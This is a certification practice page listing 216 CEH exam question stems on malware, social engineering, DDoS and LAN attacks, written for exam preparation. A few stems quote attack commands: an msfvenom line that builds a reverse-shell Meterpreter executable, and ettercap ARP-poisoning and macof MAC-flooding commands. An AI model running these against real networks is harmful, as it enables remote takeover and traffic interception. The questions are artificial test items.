Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertificationsCEHDomainsMalware, Social Engineering and Network Attacks
CEHFree — No Signup

Malware, Social Engineering and Network Attacks

Practice CEH Malware, Social Engineering and Network Attacks questions with full explanations on every answer.

216questions

Start practicing

Malware, Social Engineering and Network Attacks — choose a session length

10 questions~10 min20 questions~20 min30 questions~30 min50 questions~50 min

Free · No account required

CEH Domains

Footprinting, Reconnaissance and ScanningEnumeration and System HackingMalware, Social Engineering and Network AttacksWeb Application and Injection AttacksIntroduction to Ethical HackingScanning Networks and EnumerationVulnerability Analysis and System HackingAdvanced Topics: Wireless, Cloud, IoT, CryptographyFootprinting and ReconnaissanceNetwork and Web Application AttacksWireless, IoT and Cloud SecurityCryptography and Malware AnalysisSocial Engineering and Physical Security

Practice Malware, Social Engineering and Network Attacks questions

10Q20Q30Q50Q

All CEH Malware, Social Engineering and Network Attacks questions (216)

Start session

Click any question to see the full explanation and answer options, or start a focused practice session above.

1

A security analyst notices a high volume of ICMP Echo Reply packets on the network. The source IPs are varied, but the destination IP is the same. Which type of attack is MOST likely occurring?

2

A user receives a phone call from someone claiming to be from IT support, asking for their password to troubleshoot an issue. Which social engineering technique is being used?

3

Which tool would a penetration tester MOST likely use to perform ARP poisoning and conduct a man-in-the-middle attack on a local network?

4

An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?

5

A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?

6

An organization is experiencing repeated DDoS attacks that consume all available bandwidth. Which mitigation technique is MOST effective for handling such volumetric attacks?

7

Which type of malware is characterized by self-replication and spreading across networks without needing a host file?

8

A penetration tester uses the Social Engineering Toolkit (SET) to create a malicious USB drive that autoruns when inserted. Which social engineering technique is being employed?

9

An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?

10

Which type of malware encrypts the victim's files and demands payment for the decryption key?

11

A network administrator notices that the switch's CAM table is full, causing the switch to flood all incoming traffic out of all ports. Which attack is MOST likely occurring?

12

During a penetration test, you capture the following output: 'HTTP/1.1 200 OK ... Set-Cookie: sessionid=abc123; path=/'. You then send a request with a modified cookie value 'sessionid=abc124' and receive a valid session. Which type of vulnerability has been exploited?

13

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

14

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

15

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

16

A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?

17

Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?

18

A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?

19

An organization wants to test its employees' susceptibility to social engineering by sending fake emails that appear to come from the IT department, requesting password resets. Which tool would be MOST effective for conducting this test?

20

A security team observes that a switch's MAC address table is full, and the switch has started flooding unicast traffic to all ports. Which attack has MOST likely been performed?

21

Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?

22

An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?

23

A security analyst detects a file named 'invoice.pdf.exe' in an email attachment. When the file is submitted to VirusTotal, multiple engines detect it as a Trojan. The analyst wants to perform dynamic analysis to observe its behavior. Which approach is BEST?

24

Which type of social engineering attack involves a malicious actor impersonating a legitimate organization in a voicemail message to trick the victim into revealing sensitive information?

25

A penetration tester is performing a session hijacking attack. After capturing packets, the tester successfully predicts the TCP sequence numbers and injects packets to take over the session. Which type of attack is this?

26

A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?

27

An employee receives an email that appears to be from the CEO, requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ceo@cornpany.com instead of ceo@company.com). This is an example of which type of attack?

28

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

29

Which THREE of the following are techniques used in static malware analysis? (Select 3)

30

Which TWO of the following are common indicators of a DNS spoofing attack? (Select 2)

31

A security analyst discovers a user downloaded a file that, when executed, creates a hidden process that connects to a remote server and allows full remote control of the system. Which type of malware BEST describes this behavior?

32

A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?

33

An organization's security team observes a surge in outgoing DNS queries to external servers from a single internal host, with each query returning unusually large responses (e.g., 4000 bytes). The host is not configured as a DNS resolver. Which attack is MOST likely occurring?

34

A security analyst is investigating a suspicious file and wants to quickly determine whether it is known malware without executing it. Which approach should the analyst use FIRST?

35

A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?

36

Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?

37

During a penetration test, you execute a command that sends a large number of spoofed ICMP echo request packets to a subnet's broadcast address. This results in a flood of replies to the target system. Which attack have you performed?

38

A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?

39

A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?

40

Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?

41

A penetration tester uses the following command to scan a target: nmap -sU -sV -p 53,161,162 10.0.0.1. Which of the following BEST describes what this scan will accomplish?

42

An attacker calls a company's help desk, pretending to be a new employee who forgot his username and password. The attacker provides some employee details gleaned from social media and convinces the help desk to reset the password. Which social engineering technique is being used?

43

Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)

44

Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)

45

Which TWO of the following are examples of static malware analysis techniques? (Select two.)

46

A security analyst notices repeated failed login attempts from a single external IP address targeting the company's webmail portal. The attempts use common usernames like 'admin', 'user', and 'test'. Which type of social engineering attack is MOST likely being attempted?

47

During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?

48

An incident response team discovers a suspicious executable on a compromised workstation. They want to analyze the malware without executing it. Which of the following techniques would be MOST appropriate for this initial analysis?

49

A security analyst observes a sudden surge in incoming UDP traffic to the company's DNS servers from multiple external IP addresses. The packets appear to be DNS queries with spoofed source IPs. Which type of DDoS attack is MOST likely occurring?

50

Which of the following is a type of malware that spreads by replicating itself across a network without requiring a host file?

51

A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?

52

An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?

53

A security analyst is analyzing a suspicious file and runs the command 'strings malware.exe | grep -i http'. The output shows several URLs ending with '.exe'. What does this indicate?

54

Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?

55

A user reports that their computer is infected with ransomware. Which of the following is the BEST immediate action for the security team to take?

56

Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?

57

A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?

58

Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)

59

Which THREE of the following are examples of application-layer DDoS attacks? (Select 3)

60

Which TWO of the following are valid techniques for session hijacking? (Select 2)

61

A security analyst discovers a file named invoice.exe in an email attachment. Static analysis with PEiD indicates the file is packed with UPX. What is the BEST next step in analyzing this malware?

62

A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?

63

During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?

64

A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?

65

A user receives a phone call from someone claiming to be from IT support, asking for their password to perform a system update. This is an example of which social engineering technique?

66

A forensic analyst examines a system infected with malware that displays ransomware notes and encrypts files. The analyst uses a sandbox to observe behavior. During analysis, the malware contacts a C2 server and downloads additional payloads. Which type of malware analysis is being performed?

67

Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?

68

An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?

69

A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?

70

Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?

71

A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?

72

Which DoS attack exploits the HTTP protocol by sending partial HTTP requests to keep connections open, exhausting server resources?

73

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

74

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

75

Which TWO of the following are types of malware analysis? (Select 2)

76

A security analyst observes repeated failed login attempts from a single IP address targeting multiple user accounts. Which type of social engineering attack is being attempted?

77

A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?

78

During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?

79

An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?

80

A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?

81

After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?

82

An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?

83

During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?

84

An analyst is analyzing a suspicious file using VirusTotal and observes that only 3 out of 60 antivirus engines detect it as malicious. The file has been submitted before but with no detections. What should the analyst conclude?

85

A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?

86

An attacker wants to perform a man-in-the-middle attack on a local network. Which two tools from the following list would be most effective? (Select the best answer from the options below; note: this is a multiple choice, not multi-select) A) Wireshark B) Ettercap C) Nmap D) Metasploit E) Aircrack-ng

87

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

88

Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)

89

Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)

90

Which TWO of the following are examples of social engineering attacks? (Select two)

91

A security analyst notices an unusual spike in outbound traffic on UDP port 53 from a single internal host. The host is not a DNS server. Which type of malware is MOST likely responsible?

92

Which tool would an ethical hacker use to automatically generate a malicious USB drive that, when plugged in, executes a payload and connects back to the attacker?

93

During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?

94

A penetration tester wants to perform a stealth scan without completing the TCP three-way handshake. The target is a web server on port 80. The tester uses Nmap with the -sS flag. What is the expected behavior if the port is open?

95

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

96

A security analyst reviews logs and notices that an attacker crafted a packet with a source IP address matching the target's IP address, and sent it to a network's broadcast address. Which type of attack does this describe?

97

Which of the following is a characteristic of a polymorphic virus?

98

An organization experiences a DDoS attack where the attacker sends many incomplete HTTP requests that keep connections open, exhausting the server's connection pool. Which attack technique is being used?

99

During a social engineering engagement, an attacker calls an employee pretending to be from IT support and asks for their password to perform a system update. Which social engineering technique is being employed?

100

Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?

101

A company wants to defend against DNS amplification attacks. Which mitigation technique would be MOST effective?

102

An ethical hacker is analyzing a suspicious file using static analysis. Which of the following actions is part of static malware analysis?

103

Which TWO of the following are examples of application-layer DDoS attacks? (Choose two.)

104

Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)

105

Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)

106

A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?

107

Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?

108

An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?

109

A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?

110

Which tool can be used to perform ARP poisoning to intercept traffic between a victim and the default gateway?

111

A user reports that their system has become very slow and numerous pop-up ads appear even when browsing is not active. Which type of malware is MOST likely installed?

112

An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?

113

Which of the following is a form of social engineering where an attacker physically follows an authorized person into a restricted area without proper authentication?

114

An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?

115

A penetration tester runs the following command: `macof -i eth0 -s 192.168.1.100 -d 10.0.0.1`. Which attack is being performed?

116

Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?

117

An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?

118

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

119

Which THREE of the following are static malware analysis techniques? (Select 3)

120

Which TWO of the following are examples of session hijacking attacks? (Select 2)

121

A security analyst receives an email that appears to be from the CEO, urgently requesting a wire transfer. The email address is slightly misspelled (ceo@cornpany.com instead of ceo@company.com). Which type of social engineering attack is this?

122

During a penetration test, a tester uses a tool to perform ARP spoofing to intercept traffic between two hosts on the same subnet. Which tool is most commonly associated with this technique?

123

A security analyst runs the following command: 'python macof -i eth0 -n 1000'. Shortly after, the switch begins flooding traffic to all ports. What is the analyst trying to achieve?

124

A user reports that their system has become sluggish and they see pop-up advertisements even when no browser is open. Additionally, unknown processes are running in Task Manager. Which type of malware is most likely responsible?

125

A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?

126

After a security incident, an analyst retrieves a suspicious file. To determine if it is malicious without executing it, the analyst runs the 'strings' command and uploads the file to VirusTotal. Which type of malware analysis is being performed?

127

A penetration tester successfully predicts the TCP sequence numbers of a target and sends crafted packets to impersonate a trusted host. Which type of attack is this?

128

Which of the following is a type of malware that replicates itself by attaching to executable files and requires human action to spread, such as opening an infected attachment?

129

A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?

130

An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?

131

Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?

132

A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?

133

Which TWO of the following are characteristics of a polymorphic virus?

134

Which THREE of the following are effective DDoS mitigation techniques?

135

Which TWO of the following are examples of application-layer DDoS attacks?

136

A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?

137

During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?

138

A security analyst runs 'strings malware.exe' and finds several URLs and IP addresses. The analyst then uploads the file to VirusTotal and gets a detection ratio of 5/70. What type of analysis has been performed?

139

An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?

140

Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?

141

A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?

142

A security analyst captures network traffic and sees a sequence of ARP replies with the same IP address mapping to different MAC addresses within a short period. Which attack is indicated?

143

An attacker sends an email to the CEO of a company, pretending to be a board member and requesting a wire transfer for a confidential acquisition. Which social engineering attack is this?

144

A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?

145

Which of the following is the BEST defense against a TCP SYN flood attack?

146

A penetration tester uses a tool to spoof ARP replies, redirecting traffic through the tester's machine. The tester then captures credentials from the redirected traffic. Which tool is BEST suited for this task?

147

An employee receives an SMS message that claims to be from the IT department, asking the employee to click a link to verify their email account. Which social engineering attack is this?

148

Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)

149

Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)

150

Which THREE of the following are effective techniques to prevent ARP poisoning attacks? (Choose three.)

151

A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?

152

Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?

153

An attacker uses the Social Engineering Toolkit (SET) to craft a phishing email that appears to come from the company's CEO, requesting the recipient to urgently wire funds to a new vendor. This attack is BEST described as which type of social engineering?

154

During a penetration test, a tester captures network traffic and notices a large number of ARP replies claiming that 192.168.1.1 is at MAC address 00:11:22:33:44:55, which is different from the legitimate gateway MAC. Which attack is likely in progress?

155

A security administrator notices that the network switch is broadcasting traffic to all ports as if it were a hub. The switch logs show a sudden flood of packets with random MAC addresses. Which attack is MOST likely occurring?

156

A malware analyst wants to examine a suspicious executable without executing it. The goal is to extract strings, view the PE header, and check for known signatures. Which approach is the analyst using?

157

An organization experiences a DDoS attack where the attacker sends a flood of UDP packets to a server, causing it to become unresponsive. The packets appear to come from many different source IP addresses and are directed to random high-numbered ports. Which type of DDoS attack is this?

158

A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?

159

Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?

160

A penetration tester uses a tool to perform a man-in-the-middle attack by sending forged DNS responses that redirect users to a malicious website. Which tool is MOST likely being used to perform DNS spoofing?

161

During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?

162

An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?

163

Which TWO of the following are characteristics of a SYN flood attack? (Select 2)

164

Which THREE of the following are common methods used to mitigate DDoS attacks? (Select 3)

165

Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)

166

A security analyst receives an email from what appears to be the company's CEO requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ce0@company.com instead of ceo@company.com). Which type of social engineering attack is this?

167

A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?

168

A penetration tester needs to perform ARP poisoning to intercept traffic between two hosts on the same subnet. Which tool would be the most appropriate choice for this task?

169

During a ransomware incident response, a forensic analyst recovers a suspicious file that appears to be a PE executable. The analyst wants to quickly check if the file is known malware without executing it. Which of the following is the BEST first step?

170

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

171

A security team wants to mitigate a DNS amplification DDoS attack. Which of the following techniques would be MOST effective in preventing the attack from leveraging open DNS resolvers?

172

During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?

173

A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?

174

Which of the following is a characteristic of a polymorphic virus?

175

An attacker uses the Social Engineering Toolkit (SET) to send a malicious email to employees of a company, claiming to be from IT support and urging them to click a link to reset their password. Which social engineering attack is being performed?

176

An analyst runs the following command: `tcpdump -i eth0 src host 192.168.1.10 and dst port 80 -w http_traffic.pcap`. What is the primary purpose of this command?

177

A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?

178

Which TWO of the following are examples of application layer DDoS attacks? (Select two.)

179

Which THREE of the following are techniques used in session hijacking? (Select three.)

180

Which TWO of the following are types of malware analysis? (Select two.)

181

A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?

182

Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?

183

During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?

184

A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?

185

Which malware type is characterized by self-replication across networks without needing a host file?

186

An attacker gains physical access to a restricted area by following an authorized employee through a secured door without swiping a badge. This technique is known as:

187

A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?

188

Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?

189

A user receives a text message claiming their bank account is locked and requiring them to click a link to verify. This social engineering method is called:

190

Which malware analysis approach involves running the suspicious file in a controlled environment to observe its behavior?

191

A penetration tester uses a tool to perform a MAC flooding attack. What is the intended result of this attack?

192

Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?

193

Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)

194

Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)

195

Which TWO of the following are techniques used in session hijacking? (Choose 2)

196

A security analyst notices repeated TCP SYN packets sent to a server without corresponding SYN-ACK replies. The source IP addresses are spoofed and appear to be random. Which type of attack is MOST likely occurring?

197

A user receives an email claiming to be from their bank, asking them to click a link and verify their account credentials. The email contains spelling errors and the link points to a suspicious domain. What type of social engineering attack is this?

198

During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?

199

An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?

200

A security analyst receives an alert indicating that a workstation is sending outbound connections to a known malicious IP address. The analyst suspects a Trojan. Which tool is BEST for performing dynamic analysis of the suspicious binary?

201

An attacker intercepts a TCP session between a client and a server. By analyzing sequence numbers, the attacker successfully predicts the next sequence number and injects malicious packets. Which attack is being performed?

202

Which TWO of the following are characteristics of a polymorphic virus?

203

Which TWO tools are commonly used for ARP poisoning attacks?

204

Which THREE of the following are indicators of a slowloris DDoS attack?

205

Which TWO of the following are types of malware that specifically aim to demand payment from victims?

206

Which TWO of the following are examples of amplification attacks used in DDoS?

207

Which THREE of the following are techniques used in session hijacking?

208

Which TWO of the following are types of social engineering attacks that rely on impersonation?

209

Which THREE of the following are valid methods for DDoS mitigation?

210

Which TWO of the following are features of a Remote Access Trojan (RAT)?

211

A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?

212

During a penetration test, you run the tool 'macof' against a switch. After a few seconds, the switch starts flooding frames out all ports. Which attack have you successfully executed, and what is the primary goal of this technique?

213

An attacker sends an email that appears to come from the CEO of the company, requesting an urgent wire transfer to a specific account. This is an example of which social engineering attack?

214

A network administrator notices unusual traffic patterns: the internal DNS server is receiving large DNS queries with the source IP spoofed to appear as the internal DNS server itself. The queries appear to be amplification requests. Which TWO characteristics describe this attack?

215

During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?

216

A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?

Practice all 216 Malware, Social Engineering and Network Attacks questions

Other CEH exam domains

Footprinting, Reconnaissance and ScanningEnumeration and System HackingWeb Application and Injection AttacksIntroduction to Ethical HackingScanning Networks and EnumerationVulnerability Analysis and System HackingAdvanced Topics: Wireless, Cloud, IoT, CryptographyFootprinting and ReconnaissanceNetwork and Web Application AttacksWireless, IoT and Cloud SecurityCryptography and Malware AnalysisSocial Engineering and Physical Security

Frequently asked questions

What does the Malware, Social Engineering and Network Attacks domain cover on the CEH exam?

The Malware, Social Engineering and Network Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.

How many Malware, Social Engineering and Network Attacks questions are in the CEH question bank?

The Courseiva CEH question bank contains 216 questions in the Malware, Social Engineering and Network Attacks domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Malware, Social Engineering and Network Attacks for CEH?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Malware, Social Engineering and Network Attacks questions for CEH?

Yes — the session launcher on this page draws questions exclusively from the Malware, Social Engineering and Network Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.

Free forever · No credit card required

Track your CEH domain progress

Save your results, see per-domain analytics, and get readiness scores — free, for every certification.

Sign Up Free

Free forever · Every certification included

Practice Session

10 questions20 questions30 questions50 questions

Study Resources

All DomainsPractice TestMock ExamFlashcardsStudy Guide

Related Exams

PT0-002CS0-003SY0-701200-201